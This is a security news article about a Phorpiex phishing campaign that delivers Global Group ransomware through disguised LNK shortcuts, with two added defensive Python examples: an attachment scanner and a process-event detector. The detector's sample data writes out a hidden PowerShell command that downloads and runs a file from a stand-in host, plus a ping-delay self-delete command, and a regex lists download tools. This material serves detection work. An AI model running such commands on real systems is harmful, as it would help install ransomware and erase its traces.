The Phorpiex botnet, a malware-as-a-service platform that has been active for more than a decade, is back in circulation. In a recent high-volume campaign, attackers are sending phishing emails with the subject line "Your Document". The emails urge the recipient to open an attachment that looks like an ordinary ZIP archive containing a document.

The attachment is a trap built to deliver Global Group ransomware, a descendant of the Mamona ransomware family. The attack relies on social engineering and on abuse of Windows Shortcut (LNK) files: the shortcut inside the archive carries a double extension such as "Document.doc.lnk" so that it passes for a real document. Because Windows hides known file extensions by default, the victim sees only "Document.doc" and assumes it is an ordinary Word file.

The shortcut also borrows a standard icon from a trusted Windows resource to complete the illusion, which lowers suspicion and raises the odds of a successful infection.

[Figure: chain of attack (Source: Forcepoint)]

Forcepoint researchers, who discovered the campaign, note that the infection process is built for speed and stealth: once the victim double-clicks the shortcut, it runs its commands silently in the background.
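As an added example (not Forcepoint's or ZeroOwl's code), the following Python scans an in-memory ZIP attachment the way a gateway filter might: it flags members whose name carries a document extension followed by an executable one (the "Document.doc.lnk" trick), and, independently, members whose bytes begin with the fixed header every Windows Shortcut file starts with, so a shortcut renamed to something harmless-looking is still caught. The sample archive, its member names and the extension lists are constructed assumptions, not samples from the campaign.

```python
import io
import zipfile

# Every .lnk file begins with HeaderSize 0x4C as a little-endian uint32
# followed by the LinkCLSID 00021401-0000-0000-C000-000000000046 in its
# on-disk byte order. Matching on these 20 bytes is name-independent.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# Extensions a mail gateway should treat as executable content (assumed policy list).
EXECUTABLE_EXTS = {".lnk", ".exe", ".scr", ".js", ".vbs", ".hta", ".bat", ".cmd", ".ps1"}
# Document extensions attackers pair with them to build a double extension.
DOCUMENT_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".txt", ".rtf"}


def classify_entry(name: str, head: bytes) -> list[str]:
    """Return the reasons an archive member should be blocked (empty if none)."""
    reasons = []
    base = name.rsplit("/", 1)[-1].lower()
    exts = ["." + p for p in base.split(".")[1:]]
    if exts and exts[-1] in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {exts[-1]}")
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and exts[-1] in EXECUTABLE_EXTS:
        reasons.append("double extension masquerading as a document")
    # Name checks alone are bypassable, so also look at the leading bytes.
    if head.startswith(LNK_MAGIC):
        reasons.append("LNK header magic present regardless of name")
    return reasons


def scan_zip_attachment(data: bytes) -> dict[str, list[str]]:
    """Scan an in-memory ZIP; map each flagged member name to its reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))
            reasons = classify_entry(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample attachment for the demo (not a real campaign sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # The lure described in the article: document name, shortcut body.
        zf.writestr("Document.doc.lnk", LNK_MAGIC + b"\x00" * 60)
        # A shortcut renamed to a benign extension; only the magic check catches it.
        zf.writestr("notes.txt", LNK_MAGIC + b"\x00" * 60)
        # Filler that should not be flagged.
        zf.writestr("invoice.docx", b"PK\x03\x04 placeholder, not a real docx")
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in scan_zip_attachment(build_sample_zip()).items():
        print(member, "->", "; ".join(why))
```

A real gateway would also recurse into nested archives and apply the same byte-level check to the other executable types, but the point here is that the extension policy and the content check must both exist: the double-extension rule catches the social-engineering lure, and the header check catches the same payload when the name gives nothing away.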

The shortcut first launches the Windows Command Processor (cmd.exe), which in turn calls PowerShell to download a second-stage payload from a remote server. That payload is the Global Group ransomware itself, often given a file name that resembles a Windows driver. Because every step uses built-in system tools, the chain is a "living off the land" attack that avoids tripping conventional signature-based alarms.

A Quiet and Independent Danger

The most worrying property of Global Group ransomware is that it can run in a completely "mute" mode. Conventional ransomware typically contacts a command-and-control server to obtain or register its encryption keys; Global Group instead generates the key locally on the compromised host and performs every operation there, so it works even on offline or air-gapped machines.

That autonomy makes it especially dangerous: there is no suspicious outbound traffic for network-based detection systems to catch.

[Figure: PowerShell launched from the command prompt (Source: Forcepoint)]

The malware also takes anti-forensic steps to cover its tracks. It uses a ping command as a crude timer to delay execution briefly, then deletes its own binary from disk.

Deleting the original executable makes post-incident investigation harder. To encrypt as much data as possible without interference, the ransomware also enumerates and terminates processes belonging to databases and analysis tools, which could otherwise hold locks on the files it wants to encrypt or expose its activity.

[Figure: the ransom note (Source: Forcepoint)]

To stay safe, organizations should block executable attachments such as LNK files at the email gateway and prioritize endpoint monitoring.

Because the threat operates offline, behavior-based detection on the endpoint is essential to stop the encryption process before data is irreparably lost.
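Added example, not code from the original article or from Forcepoint: a minimal behavior-based check over process-creation events that flags the two host-side patterns described above, explorer.exe launching cmd.exe which spawns PowerShell with a download primitive (the shortcut chain), and a cmd.exe that uses ping as a delay and then deletes its own parent's executable (the anti-forensic step). The event layout is Sysmon Event ID 1 style but assumed, the sample events are constructed for illustration (the "drv.exe" name stands in for the driver-like file name the article mentions and is not a real indicator), and the regexes are a starting point rather than a tuned rule set.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style; assumed layout)."""
    pid: int
    ppid: int
    image: str      # executable base name, lower-case
    cmdline: str


# Download primitives commonly seen in PowerShell one-liners (assumed list).
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|start-bitstransfer)\b",
    re.I,
)
# "ping ... -n N ... & del ...": ping abused as a sleep before a delete.
PING_DELETE_RE = re.compile(r"\bping\b.*-n\s+\d+.*(?:&&|&|\|)\s*del\b", re.I)

# Constructed sample trace; hostnames, paths and names are invented.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(1100, 1000, "cmd.exe",
              'cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/drv.exe '
              '-OutFile $env:TEMP\\drv.exe; & $env:TEMP\\drv.exe"'),
    ProcEvent(1200, 1100, "powershell.exe",
              'powershell -w hidden -c "iwr http://example.invalid/drv.exe '
              '-OutFile C:\\Users\\u\\AppData\\Local\\Temp\\drv.exe; & C:\\Users\\u\\AppData\\Local\\Temp\\drv.exe"'),
    ProcEvent(1300, 1200, "drv.exe", "C:\\Users\\u\\AppData\\Local\\Temp\\drv.exe"),
    ProcEvent(1400, 1300, "cmd.exe",
              'cmd.exe /c ping 127.0.0.1 -n 3 > nul & del /f /q "C:\\Users\\u\\AppData\\Local\\Temp\\drv.exe"'),
    ProcEvent(1500, 1000, "winword.exe", '"C:\\Program Files\\Microsoft Office\\WINWORD.EXE" /n report.docx'),
    ProcEvent(1600, 1000, "cmd.exe", "cmd.exe /c ping 127.0.0.1 -n 1 > nul"),  # ping alone: benign
]


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, rule) pairs for events matching the shortcut-to-PowerShell
    download chain or the ping-delay delete pattern."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        grandparent = by_pid.get(parent.ppid) if parent else None

        # Rule 1: shortcut opened from Explorer -> cmd.exe -> powershell.exe
        # whose command line fetches something from the network.
        if (
            e.image == "powershell.exe"
            and parent is not None and parent.image == "cmd.exe"
            and grandparent is not None and grandparent.image == "explorer.exe"
            and DOWNLOAD_RE.search(e.cmdline)
        ):
            alerts.append((e.pid, "lnk_cmd_powershell_download"))

        # Rule 2: cmd.exe using ping as a timer and then deleting a file.
        # If the deleted path is the parent's own image, it is a self-delete.
        if e.image == "cmd.exe" and PING_DELETE_RE.search(e.cmdline):
            if parent is not None and parent.cmdline.lower() in e.cmdline.lower():
                alerts.append((e.pid, "ping_delay_self_delete"))
            else:
                alerts.append((e.pid, "ping_delay_delete"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Both rules work on parent-child relationships and command lines recorded at process start, which is why they still fire when the payload never touches the network again and deletes itself afterwards: the evidence is in the telemetry, not on disk.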